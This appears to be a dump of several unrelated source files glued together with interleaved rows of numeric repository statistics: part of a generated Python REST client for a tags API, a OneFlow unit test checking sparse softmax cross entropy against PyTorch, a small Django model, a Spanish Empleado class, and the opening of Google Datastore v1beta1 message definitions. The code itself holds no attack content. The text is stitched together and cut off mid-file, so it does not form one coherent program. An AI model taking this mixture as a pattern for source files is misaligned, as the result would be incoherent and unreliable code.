return self.api_tags_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.api_tags_get_with_http_info(**kwargs) # noqa: E501
return data
def api_tags_get_with_http_info(self, **kwargs): # noqa: E501
"""Fetch all existing tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_tags_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Search term to filter tag list
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method api_tags_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'name' in params:
query_params.append(('name', params['name'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['apiToken', 'apiUser'] # noqa: E501
return self.api_client.call_api(
'/api/tags', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[str]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def api_tags_id_delete(self, id, **kwargs): # noqa: E501
"""Delete a tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_tags_id_delete(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: Tag ID to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.api_tags_id_delete_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.api_tags_id_delete_with_http_info(id, **kwargs) # noqa: E501
return data
def api_tags_id_delete_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete a tag # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.api_tags_id_delete_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int id: Tag ID to delete (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method api_tags_id_delete" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'id' is set
        if ('id' not in params or
                params['id'] is None):
            raise ValueError("Missing the required parameter `id` when calling `api_tags_id_delete`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in params:
            path_params['id'] = params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # Authentication setting
        auth_settings = ['apiToken', 'apiUser']  # noqa: E501

        return self.api_client.call_api(
            '/api/tags/{id}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def api_tags_post(self, body, **kwargs):  # noqa: E501
        """Creates a new tag  # noqa: E501

        Creates a new tag and returns it afterwards  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.api_tags_post(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param TagEditForm body: (required)
        :return: TagEntity
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.api_tags_post_with_http_info(body, **kwargs)  # noqa: E501
        else:
            (data) = self.api_tags_post_with_http_info(body, **kwargs)  # noqa: E501
            return data

    def api_tags_post_with_http_info(self, body, **kwargs):  # noqa: E501
        """Creates a new tag  # noqa: E501

        Creates a new tag and returns it afterwards  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.api_tags_post_with_http_info(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param TagEditForm body: (required)
        :return: TagEntity
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method api_tags_post" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `api_tags_post`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # Authentication setting
        auth_settings = ['apiToken', 'apiUser']  # noqa: E501

        return self.api_client.call_api(
            '/api/tags', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='TagEntity',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
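    # --- Editor's note: hedged usage sketch, not part of the generated file.
    # These methods follow swagger-codegen conventions, so driving them
    # typically looks like the commented sketch below. The package name
    # `client`, the `TagsApi` wrapper class, and the credential values are
    # assumptions for illustration only and may differ in the real package.
    #
    #     import client
    #     config = client.Configuration()
    #     config.api_key['apiToken'] = '<token>'   # matches auth_settings above
    #     config.api_key['apiUser'] = '<user>'
    #     api = client.TagsApi(client.ApiClient(config))
    #     tag = api.api_tags_post(client.TagEditForm(name='demo'))  # -> TagEntity
    #     api.api_tags_id_delete(tag.id)           # returns None on success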
| 35.946667 | 401 | 0.598943 | 1,297 | 10,784 | 4.738628 | 0.148805 | 0.044256 | 0.027335 | 0.035145 | 0.842825 | 0.834038 | 0.80947 | 0.787016 | 0.755776 | 0.755776 | 0 | 0.015072 | 0.310924 | 10,784 | 299 | 402 | 36.06689 | 0.812004 | 0.34681 | 0 | 0.692308 | 0 | 0 | 0.154025 | 0.030774 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044872 | false | 0 | 0.025641 | 0 | 0.134615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc5fac8c48d1f5f00bf55c7b10f9bd1033b5db9c | 9,816 | py | Python | python/oneflow/test/modules/test_sparse_softmax_cross_entropy.py | grybd/oneflow | 82237ad096a10527591660c09b61444c42917e69 | [
"Apache-2.0"
] | 1 | 2022-01-19T07:50:28.000Z | 2022-01-19T07:50:28.000Z | python/oneflow/test/modules/test_sparse_softmax_cross_entropy.py | grybd/oneflow | 82237ad096a10527591660c09b61444c42917e69 | [
"Apache-2.0"
] | null | null | null | python/oneflow/test/modules/test_sparse_softmax_cross_entropy.py | grybd/oneflow | 82237ad096a10527591660c09b61444c42917e69 | [
"Apache-2.0"
] | null | null | null | """
Copyright 2020 The OneFlow Authors. All rights reserved.

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import os
from collections import OrderedDict

import numpy as np
import torch

import oneflow as flow
import oneflow.unittest
from test_util import GenArgList, type_name_to_flow_type, type_name_to_np_type


def compare_with_torch(
    device_type, data_type, label_type, batch_size, num_classes,
):
    data_type = type_name_to_flow_type[data_type]
    label_type = type_name_to_flow_type[label_type]
    np_labels = np.random.randint(0, num_classes, size=(batch_size,)).astype(np.int32)
    np_logits = np.random.random((batch_size, num_classes)).astype(np.float32)

    torch_logits = torch.tensor(np_logits, dtype=torch.float32, requires_grad=True)
    torch_labels = torch.tensor(np_labels, dtype=torch.int64)
    torch_output = torch.nn.functional.cross_entropy(
        torch_logits, torch_labels, reduction="none"
    )
    torch_output.sum().backward()

    of_logits = flow.tensor(
        np_logits, device=device_type, dtype=data_type, requires_grad=True
    )
    of_labels = flow.tensor(np_labels, device=device_type, dtype=label_type)
    of_output = flow.nn.functional.sparse_softmax_cross_entropy(
        labels=of_labels, logits=of_logits
    ).to(device_type)
    of_output.sum().backward()

    assert np.allclose(
        of_output.numpy(), torch_output.detach().numpy(), rtol=1e-03, atol=1e-04
    )
    assert np.allclose(
        of_logits.grad.numpy(), torch_logits.grad, rtol=1e-03, atol=1e-04
    )


def compare_eager_consistent_with_torch(
    device_type, data_type, label_type, batch_size, num_classes,
):
    data_type = type_name_to_flow_type[data_type]
    label_type = type_name_to_flow_type[label_type]
    np_labels = np.random.randint(0, num_classes, size=(batch_size,)).astype(np.int32)
    np_logits = np.random.random((batch_size, num_classes)).astype(np.float32)
    placement = flow.placement(device_type, {0: range(4)})
    rank = flow.env.get_rank()

    if rank == 0:
        torch_logits = torch.tensor(np_logits, dtype=torch.float32, requires_grad=True)
        torch_labels = torch.tensor(np_labels, dtype=torch.int64)
        torch_output = torch.nn.functional.cross_entropy(
            torch_logits, torch_labels, reduction="none"
        )
        torch_output.sum().backward()

    # 1D sbp
    of_logits = flow.tensor(
        np_logits, device=device_type, dtype=data_type, requires_grad=True
    )
    flow.comm.broadcast(of_logits, 0)
    of_logits = of_logits.to_consistent(placement=placement, sbp=[flow.sbp.broadcast])
    of_logits = of_logits.to_consistent(placement=placement, sbp=[flow.sbp.split(1)])
    of_labels = flow.tensor(np_labels, device=device_type, dtype=label_type)
    flow.comm.broadcast(of_labels, 0)
    of_labels = of_labels.to_consistent(placement=placement, sbp=[flow.sbp.broadcast])
    of_output = flow.nn.functional.sparse_softmax_cross_entropy(
        labels=of_labels, logits=of_logits
    ).to(device_type)
    of_output.sum().backward()
    of_logits_grad = of_logits.grad.to_consistent(
        placement=placement, sbp=[flow.sbp.broadcast]
    )
    of_logits_grad = of_logits_grad.to_local()
    of_output = of_output.to_consistent(placement=placement, sbp=[flow.sbp.broadcast])
    of_output = of_output.to_local()

    if rank == 0:
        assert np.allclose(
            of_output.numpy(), torch_output.detach().numpy(), rtol=1e-03, atol=1e-04
        )
        assert np.allclose(
            of_logits_grad.numpy(), torch_logits.grad, rtol=1e-03, atol=1e-04
        )


def compare_eager_2d_consistent_with_torch(
    device_type, data_type, label_type, batch_size, num_classes,
):
    data_type = type_name_to_flow_type[data_type]
    label_type = type_name_to_flow_type[label_type]
    np_labels = np.random.randint(0, num_classes, size=(batch_size,)).astype(np.int32)
    np_logits = np.random.random((batch_size, num_classes)).astype(np.float32)
    rank = flow.env.get_rank()

    if rank == 0:
        torch_logits = torch.tensor(np_logits, dtype=torch.float32, requires_grad=True)
        torch_labels = torch.tensor(np_labels, dtype=torch.int64)
        torch_output = torch.nn.functional.cross_entropy(
            torch_logits, torch_labels, reduction="none"
        )
        torch_output.sum().backward()

    # 2D sbp
    placement = flow.placement("cuda", {0: range(4)}, hierarchy=(2, 2))
    of_logits = flow.tensor(
        np_logits, device=device_type, dtype=data_type, requires_grad=True
    )
    flow.comm.broadcast(of_logits, 0)
    of_logits = of_logits.to_consistent(
        placement=placement, sbp=[flow.sbp.broadcast, flow.sbp.broadcast]
    )
    of_logits = of_logits.to_consistent(
        placement=placement, sbp=[flow.sbp.split(0), flow.sbp.split(1)]
    )
    of_labels = flow.tensor(np_labels, device=device_type, dtype=label_type)
    flow.comm.broadcast(of_labels, 0)
    of_labels = of_labels.to_consistent(
        placement=placement, sbp=[flow.sbp.broadcast, flow.sbp.broadcast]
    )
    of_labels = of_labels.to_consistent(
        placement=placement, sbp=[flow.sbp.split(0), flow.sbp.broadcast]
    )
    of_output = flow.nn.functional.sparse_softmax_cross_entropy(
        labels=of_labels, logits=of_logits
    ).to(device_type)
    of_output.sum().backward()
    of_logits_grad = of_logits.grad.to_consistent(
        placement=placement, sbp=[flow.sbp.broadcast, flow.sbp.broadcast]
    )
    of_logits_grad = of_logits_grad.to_local()
    of_output = of_output.to_consistent(
        placement=placement, sbp=[flow.sbp.broadcast, flow.sbp.broadcast]
    )
    of_output = of_output.to_local()

    if rank == 0:
        assert np.allclose(
            of_output.numpy(), torch_output.detach().numpy(), rtol=1e-03, atol=1e-04
        )
        assert np.allclose(
            of_logits_grad.numpy(), torch_logits.grad, rtol=1e-03, atol=1e-04
        )


def compare_lazy_consistent_with_torch(
    device_type, data_type, label_type, batch_size, num_classes,
):
    data_type = type_name_to_flow_type[data_type]
    label_type = type_name_to_flow_type[label_type]
    np_labels = np.random.randint(0, num_classes, size=(batch_size,)).astype(np.int32)
    np_logits = np.random.random((batch_size, num_classes)).astype(np.float32)
    placement = flow.placement(device_type, {0: range(4)})
    rank = flow.env.get_rank()

    if rank == 0:
        torch_logits = torch.tensor(np_logits, dtype=torch.float32, requires_grad=True)
        torch_labels = torch.tensor(np_labels, dtype=torch.int64)
        torch_output = torch.nn.functional.cross_entropy(
            torch_logits, torch_labels, reduction="none"
        )
        torch_output.sum().backward()

    class MyModule(flow.nn.Graph):
        def __init__(self):
            super(MyModule, self).__init__()

        def build(self, logits, labels):
            output = flow.nn.functional.sparse_softmax_cross_entropy(
                labels=labels, logits=logits
            )
            # nn.Graph does not support reading input gradients, so the
            # backward pass is not exercised here.
            # output.sum().backward()
            return output

    of_logits = flow.tensor(
        np_logits, device=device_type, dtype=data_type, requires_grad=True
    )
    flow.comm.broadcast(of_logits, 0)
    of_logits = of_logits.to_consistent(placement=placement, sbp=[flow.sbp.broadcast])
    of_logits = of_logits.to_consistent(placement=placement, sbp=[flow.sbp.split(1)])
    of_labels = flow.tensor(np_labels, device=device_type, dtype=label_type)
    flow.comm.broadcast(of_labels, 0)
    of_labels = of_labels.to_consistent(placement=placement, sbp=[flow.sbp.broadcast])

    graph = MyModule()
    of_output = graph(of_logits, of_labels)
    of_output = of_output.to_consistent(placement=placement, sbp=[flow.sbp.broadcast])
    of_output = of_output.to_local()
    flow._oneflow_internal.eager.multi_client.Sync()

    if rank == 0:
        assert np.allclose(
            of_output.numpy(), torch_output.detach().numpy(), rtol=1e-03, atol=1e-04
        )
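

# --- Editor's addition: a hedged NumPy reference for what the comparisons
# above check. Sparse softmax cross entropy for logits x and integer labels y
# is loss_i = -log(softmax(x_i)[y_i]) = logsumexp(x_i) - x_i[y_i]. This helper
# is illustrative only and is not called by the test cases below.
def _np_sparse_softmax_cross_entropy(logits, labels):
    # logits: (batch, num_classes) float array; labels: (batch,) int array
    shifted = logits - logits.max(axis=1, keepdims=True)  # numerical stability
    log_z = np.log(np.exp(shifted).sum(axis=1))           # logsumexp of shifted
    return log_z - shifted[np.arange(labels.shape[0]), labels]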
class TestSparseSoftmaxCrossEntropyWithLogits(flow.unittest.TestCase):
    @flow.unittest.skip_unless_1n1d()
    def test_sparse_softmax_cross_entropy(test_case):
        arg_dict = OrderedDict()
        arg_dict["device_type"] = ["cuda", "cpu"]
        arg_dict["data_type"] = ["float32", "double"]
        arg_dict["label_type"] = ["int32", "int64"]
        arg_dict["batch_size"] = [64, 16]
        arg_dict["num_classes"] = [100, 1000]
        for arg in GenArgList(arg_dict):
            compare_with_torch(*arg)


class TestSparseSoftmaxCrossEntropyMsWithLogits(flow.unittest.TestCase):
    @unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
    @flow.unittest.skip_unless_1n4d()
    def test_distributed_sparse_softmax_cross_entropy(test_case):
        arg_dict = OrderedDict()
        arg_dict["device_type"] = ["cuda"]
        arg_dict["data_type"] = ["float32", "double"]
        arg_dict["label_type"] = ["int32", "int64"]
        arg_dict["batch_size"] = [64]
        arg_dict["num_classes"] = [1000]
        for arg in GenArgList(arg_dict):
            # compare_eager_consistent_with_torch(*arg)
            compare_eager_2d_consistent_with_torch(*arg)
            compare_lazy_consistent_with_torch(*arg)


if __name__ == "__main__":
    unittest.main()
| 38.952381 | 87 | 0.699776 | 1,356 | 9,816 | 4.777286 | 0.130531 | 0.041988 | 0.039518 | 0.069466 | 0.804106 | 0.791448 | 0.786045 | 0.786045 | 0.774931 | 0.766749 | 0 | 0.018539 | 0.186736 | 9,816 | 251 | 88 | 39.10757 | 0.792935 | 0.071007 | 0 | 0.651515 | 0 | 0 | 0.024926 | 0.002306 | 0 | 0 | 0 | 0 | 0.035354 | 1 | 0.040404 | false | 0 | 0.040404 | 0 | 0.10101 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc68ee80c9e11bc4b74757df1e6390db9f04a4bc | 235 | py | Python | presentation/models.py | axell-brendow/fullcycle03-challenge4 | 111ee240781b4213f5e7ebace26f067bbe3d13f8 | [
"MIT"
] | 1 | 2020-07-03T12:22:49.000Z | 2020-07-03T12:22:49.000Z | presentation/models.py | axell-brendow/fullcycle03-challenge4 | 111ee240781b4213f5e7ebace26f067bbe3d13f8 | [
"MIT"
] | 2 | 2021-03-30T14:00:29.000Z | 2021-04-08T21:19:47.000Z | presentation/models.py | axell-brendow/fullcycle03-challenge4 | 111ee240781b4213f5e7ebace26f067bbe3d13f8 | [
"MIT"
] | null | null | null | from django.db import models


class Class(models.Model):
    name = models.CharField(max_length=255)
    link = models.CharField(max_length=500)

    def __str__(self):
        return f'{{ name: "{self.name}", link: "{self.link}" }}'
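
# --- Editor's note: a hedged usage sketch. Inside a configured Django
# project (app in INSTALLED_APPS, migrations applied), the model is used as
# below; the name and link values are illustrative only.
#
#     lesson = Class.objects.create(name="Algebra", link="https://example.com/algebra")
#     str(lesson)  # -> '{ name: "Algebra", link: "https://example.com/algebra" }'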
| 23.5 | 64 | 0.655319 | 32 | 235 | 4.625 | 0.59375 | 0.202703 | 0.243243 | 0.324324 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031414 | 0.187234 | 235 | 9 | 65 | 26.111111 | 0.743456 | 0 | 0 | 0 | 0 | 0 | 0.195745 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0.166667 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
5d974c3f1b79613716106e07896431719d622c39 | 243 | py | Python | Fundamentos/polimorfismo/empleado.py | ijchavez/python | bccd94a9bee90125e2be27b0355bdaedb0ae9d19 | [
"Unlicense"
] | null | null | null | Fundamentos/polimorfismo/empleado.py | ijchavez/python | bccd94a9bee90125e2be27b0355bdaedb0ae9d19 | [
"Unlicense"
] | null | null | null | Fundamentos/polimorfismo/empleado.py | ijchavez/python | bccd94a9bee90125e2be27b0355bdaedb0ae9d19 | [
"Unlicense"
] | null | null | null | class Empleado:
    def __init__(self, nombre, sueldo):
        self.nombre = nombre
        self.sueldo = sueldo

    def __str__(self):
        cadena = "Nombre: " + self.nombre + ", Sueldo: " + str(self.sueldo)
        return cadena
| 30.375 | 75 | 0.572016 | 26 | 243 | 5.038462 | 0.384615 | 0.229008 | 0.244275 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.312757 | 243 | 8 | 76 | 30.375 | 0.784431 | 0 | 0 | 0 | 0 | 0 | 0.07377 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6
5ddfdce1d85382017935635582ae2d27570169b6 | 30,940 | py | Python | lib/googlecloudsdk/third_party/apis/datastore/v1beta1/datastore_v1beta1_messages.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | null | null | null | lib/googlecloudsdk/third_party/apis/datastore/v1beta1/datastore_v1beta1_messages.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | 11 | 2020-02-29T02:51:12.000Z | 2022-03-30T23:20:08.000Z | lib/googlecloudsdk/third_party/apis/datastore/v1beta1/datastore_v1beta1_messages.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | 1 | 2020-07-24T18:47:35.000Z | 2020-07-24T18:47:35.000Z | """Generated message classes for datastore version v1beta1.

Accesses the schemaless NoSQL database to provide fully managed, robust,
scalable storage for your application.
"""
# NOTE: This file is autogenerated and should not be edited by hand.

from apitools.base.protorpclite import messages as _messages
from apitools.base.py import encoding
from apitools.base.py import extra_types


package = 'datastore'


class DatastoreProjectsExportRequest(_messages.Message):
  r"""A DatastoreProjectsExportRequest object.

  Fields:
    googleDatastoreAdminV1beta1ExportEntitiesRequest: A
      GoogleDatastoreAdminV1beta1ExportEntitiesRequest resource to be passed
      as the request body.
    projectId: Project ID against which to make the request.
  """

  googleDatastoreAdminV1beta1ExportEntitiesRequest = _messages.MessageField('GoogleDatastoreAdminV1beta1ExportEntitiesRequest', 1)
  projectId = _messages.StringField(2, required=True)


class DatastoreProjectsImportRequest(_messages.Message):
  r"""A DatastoreProjectsImportRequest object.

  Fields:
    googleDatastoreAdminV1beta1ImportEntitiesRequest: A
      GoogleDatastoreAdminV1beta1ImportEntitiesRequest resource to be passed
      as the request body.
    projectId: Project ID against which to make the request.
  """

  googleDatastoreAdminV1beta1ImportEntitiesRequest = _messages.MessageField('GoogleDatastoreAdminV1beta1ImportEntitiesRequest', 1)
  projectId = _messages.StringField(2, required=True)


class GoogleDatastoreAdminV1CommonMetadata(_messages.Message):
  r"""Metadata common to all Datastore Admin operations.

  Enums:
    OperationTypeValueValuesEnum: The type of the operation. Can be used as a
      filter in ListOperationsRequest.
    StateValueValuesEnum: The current state of the Operation.

  Messages:
    LabelsValue: The client-assigned labels which were provided when the
      operation was created. May also include additional labels.

  Fields:
    endTime: The time the operation ended, either successfully or otherwise.
    labels: The client-assigned labels which were provided when the operation
      was created. May also include additional labels.
    operationType: The type of the operation. Can be used as a filter in
      ListOperationsRequest.
    startTime: The time that work began on the operation.
    state: The current state of the Operation.
  """

  class OperationTypeValueValuesEnum(_messages.Enum):
    r"""The type of the operation. Can be used as a filter in
    ListOperationsRequest.

    Values:
      OPERATION_TYPE_UNSPECIFIED: Unspecified.
      EXPORT_ENTITIES: ExportEntities.
      IMPORT_ENTITIES: ImportEntities.
      CREATE_INDEX: CreateIndex.
      DELETE_INDEX: DeleteIndex.
    """
    OPERATION_TYPE_UNSPECIFIED = 0
    EXPORT_ENTITIES = 1
    IMPORT_ENTITIES = 2
    CREATE_INDEX = 3
    DELETE_INDEX = 4

  class StateValueValuesEnum(_messages.Enum):
    r"""The current state of the Operation.

    Values:
      STATE_UNSPECIFIED: Unspecified.
      INITIALIZING: Request is being prepared for processing.
      PROCESSING: Request is actively being processed.
      CANCELLING: Request is in the process of being cancelled after user
        called google.longrunning.Operations.CancelOperation on the operation.
      FINALIZING: Request has been processed and is in its finalization stage.
      SUCCESSFUL: Request has completed successfully.
      FAILED: Request has finished being processed, but encountered an error.
      CANCELLED: Request has finished being cancelled after user called
        google.longrunning.Operations.CancelOperation.
    """
    STATE_UNSPECIFIED = 0
    INITIALIZING = 1
    PROCESSING = 2
    CANCELLING = 3
    FINALIZING = 4
    SUCCESSFUL = 5
    FAILED = 6
    CANCELLED = 7

  @encoding.MapUnrecognizedFields('additionalProperties')
  class LabelsValue(_messages.Message):
    r"""The client-assigned labels which were provided when the operation was
    created. May also include additional labels.

    Messages:
      AdditionalProperty: An additional property for a LabelsValue object.

    Fields:
      additionalProperties: Additional properties of type LabelsValue
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a LabelsValue object.

      Fields:
        key: Name of the additional property.
        value: A string attribute.
      """

      key = _messages.StringField(1)
      value = _messages.StringField(2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  endTime = _messages.StringField(1)
  labels = _messages.MessageField('LabelsValue', 2)
  operationType = _messages.EnumField('OperationTypeValueValuesEnum', 3)
  startTime = _messages.StringField(4)
  state = _messages.EnumField('StateValueValuesEnum', 5)


class GoogleDatastoreAdminV1EntityFilter(_messages.Message):
  r"""Identifies a subset of entities in a project. This is specified as
  combinations of kinds and namespaces (either or both of which may be all, as
  described in the following examples). Example usage: Entire project:
  kinds=[], namespace_ids=[] Kinds Foo and Bar in all namespaces:
  kinds=['Foo', 'Bar'], namespace_ids=[] Kinds Foo and Bar only in the
  default namespace: kinds=['Foo', 'Bar'], namespace_ids=[''] Kinds Foo and
  Bar in both the default and Baz namespaces: kinds=['Foo', 'Bar'],
  namespace_ids=['', 'Baz'] The entire Baz namespace: kinds=[],
  namespace_ids=['Baz']

  Fields:
    kinds: If empty, then this represents all kinds.
    namespaceIds: An empty list represents all namespaces. This is the
      preferred usage for projects that don't use namespaces. An empty string
      element represents the default namespace. This should be used if the
      project has data in non-default namespaces, but doesn't want to include
      them. Each namespace in this list must be unique.
  """

  kinds = _messages.StringField(1, repeated=True)
  namespaceIds = _messages.StringField(2, repeated=True)


class GoogleDatastoreAdminV1ExportEntitiesMetadata(_messages.Message):
  r"""Metadata for ExportEntities operations.

  Fields:
    common: Metadata common to all Datastore Admin operations.
    entityFilter: Description of which entities are being exported.
    outputUrlPrefix: Location for the export metadata and data files. This
      will be the same value as the
      google.datastore.admin.v1.ExportEntitiesRequest.output_url_prefix field.
      The final output location is provided in
      google.datastore.admin.v1.ExportEntitiesResponse.output_url.
    progressBytes: An estimate of the number of bytes processed.
    progressEntities: An estimate of the number of entities processed.
  """

  common = _messages.MessageField('GoogleDatastoreAdminV1CommonMetadata', 1)
  entityFilter = _messages.MessageField('GoogleDatastoreAdminV1EntityFilter', 2)
  outputUrlPrefix = _messages.StringField(3)
  progressBytes = _messages.MessageField('GoogleDatastoreAdminV1Progress', 4)
  progressEntities = _messages.MessageField('GoogleDatastoreAdminV1Progress', 5)


class GoogleDatastoreAdminV1ExportEntitiesResponse(_messages.Message):
  r"""The response for
  google.datastore.admin.v1.DatastoreAdmin.ExportEntities.

  Fields:
    outputUrl: Location of the output metadata file. This can be used to begin
      an import into Cloud Datastore (this project or another project). See
      google.datastore.admin.v1.ImportEntitiesRequest.input_url. Only present
      if the operation completed successfully.
  """

  outputUrl = _messages.StringField(1)


class GoogleDatastoreAdminV1ImportEntitiesMetadata(_messages.Message):
  r"""Metadata for ImportEntities operations.

  Fields:
    common: Metadata common to all Datastore Admin operations.
    entityFilter: Description of which entities are being imported.
    inputUrl: The location of the import metadata file. This will be the same
      value as the google.datastore.admin.v1.ExportEntitiesResponse.output_url
      field.
    progressBytes: An estimate of the number of bytes processed.
    progressEntities: An estimate of the number of entities processed.
  """

  common = _messages.MessageField('GoogleDatastoreAdminV1CommonMetadata', 1)
  entityFilter = _messages.MessageField('GoogleDatastoreAdminV1EntityFilter', 2)
  inputUrl = _messages.StringField(3)
  progressBytes = _messages.MessageField('GoogleDatastoreAdminV1Progress', 4)
  progressEntities = _messages.MessageField('GoogleDatastoreAdminV1Progress', 5)


class GoogleDatastoreAdminV1IndexOperationMetadata(_messages.Message):
  r"""Metadata for Index operations.

  Fields:
    common: Metadata common to all Datastore Admin operations.
    indexId: The index resource ID that this operation is acting on.
    progressEntities: An estimate of the number of entities processed.
  """

  common = _messages.MessageField('GoogleDatastoreAdminV1CommonMetadata', 1)
  indexId = _messages.StringField(2)
  progressEntities = _messages.MessageField('GoogleDatastoreAdminV1Progress', 3)


class GoogleDatastoreAdminV1Progress(_messages.Message):
  r"""Measures the progress of a particular metric.

  Fields:
    workCompleted: The amount of work that has been completed. Note that this
      may be greater than work_estimated.
    workEstimated: An estimate of how much work needs to be performed. May be
      zero if the work estimate is unavailable.
  """

  workCompleted = _messages.IntegerField(1)
  workEstimated = _messages.IntegerField(2)


class GoogleDatastoreAdminV1beta1CommonMetadata(_messages.Message):
  r"""Metadata common to all Datastore Admin operations.

  Enums:
    OperationTypeValueValuesEnum: The type of the operation. Can be used as a
      filter in ListOperationsRequest.
    StateValueValuesEnum: The current state of the Operation.

  Messages:
    LabelsValue: The client-assigned labels which were provided when the
